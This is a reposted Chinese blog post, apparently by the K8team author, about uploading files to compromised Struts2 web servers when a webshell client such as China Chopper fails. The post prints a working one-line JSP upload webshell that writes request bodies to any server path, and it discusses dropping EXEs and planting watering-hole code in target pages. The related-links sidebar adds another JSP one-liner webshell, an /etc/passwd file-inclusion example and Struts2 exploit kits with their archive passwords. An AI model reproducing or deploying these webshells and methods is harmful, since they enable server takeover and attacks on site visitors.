[原创]Struts2奇葩环境任意文件上传工具

最新推荐文章于 2022-09-24 20:14:14 发布
最新推荐文章于 2022-09-24 20:14:14 发布
阅读量97 收藏
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/k8gege/p/10261217.html
版权
[原创]Struts2奇葩环境任意文件上传工具(解决菜刀无法传文件或上传乱码等问题)

 上面这问题问得好 
1 不知道大家有没碰到有些Strus2站点  上传JSP后访问404 或者503
    注意我说的是404或503不是403(要是403换个css/img等目录或许可以)
    但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办
2 估计大部分人碰到的是可以上传小马无法上传大马 怎么办?
3 碰到可上传菜刀马,但无法通过菜刀上传任何文件怎么办?
4 比如通过菜刀传别的马进去JSP代码被截断了怎么办?
5 或者说目标站点页面是XX语言,实施水坑,修改代码保存乱码 怎么办?

第一份 byte
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
0x001 对应连接工具为13年作品 (工具大家自己找)

第二份 Hex因年前碰到一个环境 13年的竟然不兼容 因工作需要又弄了一份
第一步 使用k8最新s2工具 通过漏洞上传小马2
 
0x002 连接小马 填写对应URL,填写输出文件名 点击任意文件上传即可

 0x003 随便找的一个URL测试(应用用win系统才对),不过上传EXE 再下载回本地(测试能用没损坏也是一样)

转载于:https://www.cnblogs.com/k8gege/p/10261217.html

weixin_30794491
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
K8_Struts2_EXP S2-045 & 任意文件上传 20170310
09-15
K8_Struts2_EXP S2-045 & 任意文件上传 20170310,无密码,2017版,最新版
struts2上传工具
一曲破东风的专栏
06-29 1090
struts2上传工具
struts2实现文件上传工具
dsh989224的专栏
11-21 120
FileTool.java import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.util.Calendar; import java.util.Locale; /** ...
Struts2实现文件的上传功能
CSU_Zipple的博客
10-10 807
需求来源于生活:一个业余程序员的突发奇想 以前做班委的时候,经常要向班里收集各种各样的资料。既要对已交同学的文件作出统一规范化的命名,又要及时提醒那些迟交的同学该交资料了。这是一项重复性的工作。 老师以前教育我们机器是最适合做重复性工作的,于是便有了这样一个小小的需求:为自己班级实现一个统一的提交作业的平台。 说干就干。 这个小项目的核心就在于上传下载。同学们上传,班委(管理员)统一打包下载资
K8_Struts2_EXP+S2-045+&+任意文件上传+20170309
11-23
K8_Struts2_EXP+S2-045+&+任意文件上传+20170309,struts安全漏洞扫描工具
Struts2实现文件上传功能
08-28
Struts2实现文件上传功能 Struts2是一种基于MVC模式的Web应用框架,提供了许多实用的功能,包括实现文件上传功能。在Struts2中,实现文件上传功能主要是通过使用Jakarta的Common-FileUpload文件上传框架来实现的。 ...
struts2+jsp实现文件上传的方法
01-08
本文实例讲述了struts2+jsp实现文件上传的方法。分享给大家供大家参考。具体如下: 1. java代码: package com.wang.test; import java.io.InputStream; import org.apache.struts2.ServletActionContext; import ...
Struts2修改上传文件大小限制方法解析
08-29
Struts2修改上传文件大小限制方法解析 Struts2是基于Java Servlet和JavaServer Faces(JSF)技术的Web应用程序框架,用于开发企业级Web应用程序。Struts2提供了一个灵活的框架来处理Web应用程序中的请求和响应。...
java Struts2框架下实现文件上传功能
09-01
Struts2框架下实现文件上传功能,我们需要遵循一系列步骤,包括配置、编写Action类以及处理上传后的操作。以下是对这些步骤的详细说明: 1. **配置Struts2框架**: - 首先,你需要确保在项目中引入了Struts2的...
任意文件包含(搭的环境)
3569
07-27 340
首先自己搭一个环境 在centos虚拟机里边的根目录下创建一个show.php $name = $_GET['name']; include({"${name}");              //注意,这里要用双引号,因为里边有变量,只有双引号里边才可以识别变量 ?> 然后访问虚拟机 192.168.0.107/show.php?name=/etc/passwd 访问成
K8_Struts2_漏洞利用工具解压密码:k8team
09-26
著名的K8_Struts2_漏洞利用工具,可利用Struts2_漏洞进行任意代码执行和任意文件上传。 本工具仅供学习交流,请勿用于任何非法活动。
任意上传漏洞演示
03-07
讲述了任意上传漏洞以及一句话木
K8_Struts2_EXP 20170310
12-14
K8_Struts2_EXP 20170310是一款用于检测项目是否存在Struts系列漏洞的工具,切勿用于恶意破坏,如果造成法律效应作者概不负责。切记,切记,切记!
利用Spring输出HelloWorld
12-08
Spring入门,基本配置信息,JavaBean的书写,配置文件的格式,配置文件的要求,Spring 所需的jar包,applcationContext的相关介绍
K8Struts2Exploit(S2
11-10
解压密码:k8team[+]S2-020CVE-2014-0094支持GetShell(这洞特殊,EXP集成在飞刀)[+]S2-019CVE-2013-4316支持GetShell/获取物理路径/执行CMD命令[+]S2-016CVE-2013-2251支持GetShell/获取物理路径/执行CMD命令[+]S2-013CVE-2013-1966支持GetShell/获取物理路径/执行CMD命令[+]S2-009CVE-2011-3923支持GetShell/获取物理路径/执行CMD命令[+]S2-005CVE-2010-1870支持GetShell/获取物理路径/执行CMD命令/列文件目录-
[原创]K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)
weixin_30446613的博客
01-12 7551
工具:K8Struts2Exploit组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2014/7/3110:24:56简介: K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)Struts2漏洞检测工具 Struts2漏洞测试工...
CVE-2022-29464 WSO2 任意文件上传漏洞复现
最新发布
热爱学习,喜欢折腾!
09-24 1533
WSO2 是一个领先的开源 SOA 解决方案,包含了 SOA 相关的各种基础设施、技术框架和相关工具、流程 server、appserver 等。近日,WSO2 官网发布关于 WSO2 API Manager 中存在任意文件上传和远程代码执行漏洞的信息。该漏洞是由于 WSO2 存在路由对输入的内容过滤不严格,攻击者可以利用该漏洞在未授权的情况下,构造恶意数据执行文件上传攻击,最终获取服务器最高权限。
一句话木:JSP篇
09-21 8714
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
Struts2实现文件上传与下载实战教程
Struts2是一个流行的Java Web应用程序框架,其强大的功能之一是文件上传和下载的支持。本章主要介绍了如何在Struts2应用中实现文件的上传和下载功能。 首先,Struts2框架默认集成Apache Jakarta的Commons-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值